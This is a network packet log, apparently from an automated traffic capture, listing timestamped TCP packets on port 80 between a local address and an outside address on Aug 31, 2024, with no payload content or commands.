Aug 31, 2024 22:41:57.473241091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473262072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473298073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473521948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473556995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473583937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473607063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473628998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473651886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473676920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473701000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473815918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473845005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473869085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473953962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.473984957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474060059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474086046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474112988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474128008 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.474142075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474206924 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.474219084 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.474225044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474231958 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.474282026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474472046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474498987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474524975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474550962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474572897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474592924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474627972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474653959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474766016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474797964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474823952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474848986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474960089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.474987030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475084066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475106955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475132942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475233078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475255013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475284100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475477934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475505114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475528002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475548983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475579977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475860119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475887060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.475913048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476008892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476078033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476103067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476129055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476150990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476175070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476203918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476412058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.476994991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477025032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477040052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477066040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477129936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477148056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477169991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477185965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477210045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477224112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477247000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477446079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477473974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477499962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477509022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477536917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477556944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477577925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477598906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477618933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477636099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477654934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477678061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477699041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477950096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.477963924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478022099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478045940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478064060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478090048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478168964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478185892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478576899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478590965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478615046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478631020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478709936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478723049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478746891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478758097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478782892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478847980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478863955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478883982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478933096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478940964 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.478952885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478957891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.478969097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478970051 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.478981018 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.478984118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.478991985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479002953 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479007006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479015112 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479024887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479026079 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479037046 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479047060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479057074 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479068041 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479074955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479079008 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479089975 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479096889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479100943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479111910 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479115963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479121923 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479130983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479132891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479144096 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479152918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479156017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479165077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479166985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479177952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479188919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479199886 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479212046 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479234934 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479247093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479257107 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479266882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479278088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479289055 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479299068 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479300976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479310036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479321003 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479326010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479332924 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479342937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479343891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479355097 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479360104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479365110 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479376078 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479381084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479387045 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479397058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479397058 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479408026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479415894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479418039 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479429960 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479438066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479439974 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479450941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479456902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479461908 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479470968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479473114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.479485989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479507923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479525089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479543924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.479619026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.481456041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.481488943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482047081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482073069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482086897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482115030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482140064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482163906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482177973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482202053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482218981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482304096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482331991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482355118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482369900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482434988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482456923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482480049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482496023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482520103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482536077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482593060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482610941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482637882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482697964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482716084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482736111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482758045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482778072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482799053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.482816935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483072042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483084917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483108044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483129025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483144045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483175993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483197927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483212948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483236074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483261108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483279943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483370066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483392954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483409882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483422995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483448029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483531952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483553886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483572960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483589888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483614922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483633995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483654976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483666897 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483678102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483683109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483690023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483700037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483709097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483711004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483721972 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483735085 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483735085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483746052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483756065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483767033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483777046 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483788013 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483792067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483798981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483808994 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483808994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483819962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483830929 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483836889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483841896 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483853102 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483858109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483864069 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483875036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483876944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483892918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483899117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.483903885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483915091 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483926058 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483938932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483949900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483959913 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483971119 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483980894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.483990908 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484002113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484011889 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484023094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484034061 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484038115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484045029 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484055996 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484064102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484066963 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484077930 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484087944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484087944 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484100103 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484103918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484110117 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484121084 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484131098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484133959 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484148026 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484149933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484158993 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484170914 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484175920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484196901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484198093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484210014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484220028 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484222889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484230995 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484236956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484241962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484251976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484257936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484262943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484273911 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484283924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484285116 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484296083 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484297037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484308004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484318972 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484328985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484339952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484350920 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484360933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484371901 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484376907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484384060 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484395027 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.484400034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484422922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484483957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484496117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484519005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484540939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484561920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484577894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484596968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.484616041 CEST	49732	80	192.168.2.4	185.215.113.19
